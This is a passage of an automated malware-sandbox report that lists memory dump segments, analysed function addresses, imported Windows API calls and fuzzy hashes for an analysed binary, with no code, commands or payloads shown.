Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: YT[m$_R]q$mpw|$5t
API String ID: 0-2958985175
Opcode ID: b5155df934a0f744b90fa56559a34bc43e7f78929b33aa7872c3ffe9aeb871da
Instruction ID: 1164578a3b5e9a87fa257aaa45d0d8bbe71e8aa13de73727fec7b9f6eadf6644
Opcode Fuzzy Hash: b5155df934a0f744b90fa56559a34bc43e7f78929b33aa7872c3ffe9aeb871da
Instruction Fuzzy Hash: E6B20AF3A0C200AFE7046E2DEC8567AB7E9EF94720F1A493DE6C5C3344EA7558148697

Function 6CB4545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CB48A4B

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 73c7c3159083e7b7458b2d0fa071a261538accf879c5b6808920953281f62134
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: FCB11772E0425A8FDB24CF68CC807EDB7B6EF85314F1842A9C549DB789D7309989DB90

Function 6CB4542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CB488F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CB4925C

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: b0a5e2d7426b6a964172b7cc5d4514e3b0f92a900cd64f019a38c04953c1a319
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 0CB1E572E0424ACBDB14CF58CC806ADB7B6EF84314F144269C949EB789D730A989DB90

Function 00AC8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00AB5184,40000001,00000000,00000000,?,00AB5184), ref: 00AC8EC0

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 5327f2ec4f6d2cb95a443a43227973db8272d1592525962874faea8be8ec1ddf
Instruction ID: fb9ce46567ae1eb352ec0c6877a9689e8a79226329d54ad11524d6e5ac4325f9
Opcode Fuzzy Hash: 5327f2ec4f6d2cb95a443a43227973db8272d1592525962874faea8be8ec1ddf
Instruction Fuzzy Hash: E111F2B0200208AFDB00CF64E885FAA77A9BF89314F11945CF919CB250DB79E841DBA1

Function 00AB9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AB4EEE,00000000,00000000), ref: 00AB9AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00AB4EEE,00000000,?), ref: 00AB9B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00AB4EEE,00000000,00000000), ref: 00AB9B2A
LocalFree.KERNEL32(?,?,?,?,00AB4EEE,00000000,?), ref: 00AB9B3F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 661570eb34d5746bc54c3f9400f95f23a44888d06fd1fed7b0fae375386e1810
Instruction ID: b847df2be9b62c0341cb9ac7df0d58ddae97cd8beaa9a2a1b17ba9a8813907c6
Opcode Fuzzy Hash: 661570eb34d5746bc54c3f9400f95f23a44888d06fd1fed7b0fae375386e1810
Instruction Fuzzy Hash: 7711A7B4240308AFDB10CF64DC55FAAB7B5FB49700F208058FA199B3D0C7B5A901CB51

Function 00AC7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00AD0E00,00000000,?), ref: 00AC79B0
RtlAllocateHeap.NTDLL(00000000), ref: 00AC79B7
GetLocalTime.KERNEL32(?,?,?,?,?,00AD0E00,00000000,?), ref: 00AC79C4
wsprintfA.USER32 ref: 00AC79F3

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 8d5db0ae4500f23d44cdd772be71345dcbe657d4e34fe45314f69c84407a2630
Instruction ID: 32130c5f1a70ed5f465cf273af7853e9eec23a9b23bf779f6d1b46c46f575299
Opcode Fuzzy Hash: 8d5db0ae4500f23d44cdd772be71345dcbe657d4e34fe45314f69c84407a2630
Instruction Fuzzy Hash: 8F11E5B2904118ABCB149FDADD45BBEF7F8FB4CB11F10465AF605A2280E6795940CBB2

Function 00E897FB Relevance: 5.4, Strings: 3, Instructions: 1614COMMON

Download Yara Rule

Strings

Y`/, xrefs: 00E8A77F
To[, xrefs: 00E89A17
Am, xrefs: 00E8A281

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Am$To[$Y`/
API String ID: 0-3576065333
Opcode ID: 1f24b79e7f2a9649ecbb6ec37586d000b718615cb7acb103d09707c4351ede15
Instruction ID: 7d9018df4405333a35d49532ba7557dfa855bbd8b66e08adbfdb168a13ce596c
Opcode Fuzzy Hash: 1f24b79e7f2a9649ecbb6ec37586d000b718615cb7acb103d09707c4351ede15
Instruction Fuzzy Hash: DCB229F360C2049FE3046E2DEC8567AFBE9EF94320F1A493DEAC5C3744EA7558058696

Function 6CB16CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6CB16D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CB16E1E

Memory Dump Source

Source File: 00000000.00000002.2456589135.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAD0000, based on PE: true

Associated: 00000000.00000002.2456560223.000000006CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456636137.000000006CB4D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456651859.000000006CB5E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2456666418.000000006CB62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cad0000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 82306a3c76963a13245ee28a985a7f6f774adf3703406901cdb7a7ffc67797a8
Instruction ID: 0b265bc250909f6a16d4fb5a15f81b5c6b31b0e42bc5d59226405f59cfb910ca
Opcode Fuzzy Hash: 82306a3c76963a13245ee28a985a7f6f774adf3703406901cdb7a7ffc67797a8
Instruction Fuzzy Hash: 0BA17D756183808FCB15CF24C4907AEBBE6FF89308F44495DE88A87B51DB70A949CB92

Function 00AC3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(00ACE118,00000000,00000001,00ACE108,00000000), ref: 00AC3758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00AC37B0

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: fa83970b57e5fec914f2da309bc4217ceb4999ecd33f7f35d4f41bc65287a53e
Instruction ID: fde7acee9539152194feefb4ee8658ab245b445c7395f840b9ed2c674d4ff304
Opcode Fuzzy Hash: fa83970b57e5fec914f2da309bc4217ceb4999ecd33f7f35d4f41bc65287a53e
Instruction Fuzzy Hash: 9041C871A40A28AFDB24DB58CC95F9BB7B5BB48702F4081D8E609E72D0D7B16E85CF50

Function 00E8495C Relevance: 4.1, Strings: 2, Instructions: 1583COMMON

Download Yara Rule

Strings

;yW, xrefs: 00E84C1A
=7o^, xrefs: 00E8588C

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: =7o^$;yW
API String ID: 0-1132671220
Opcode ID: cc208d1f7157db3f4b52ec7c3139d98db28d1a5f2c81b91908b7dad40bdbfae4
Instruction ID: 04eb0ba48796c964b35750656e27c2c14bf9899540a1fcc340e0632e28849927
Opcode Fuzzy Hash: cc208d1f7157db3f4b52ec7c3139d98db28d1a5f2c81b91908b7dad40bdbfae4
Instruction Fuzzy Hash: D0B2E5F360C200AFE3046E29EC8567AFBEAEFD4720F1A493DE6C487744E67558058697

Function 00D915DB Relevance: 4.0, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

nTu>, xrefs: 00D917D7
_usg, xrefs: 00D915F1
]{}w, xrefs: 00D91753

Memory Dump Source

Source File: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
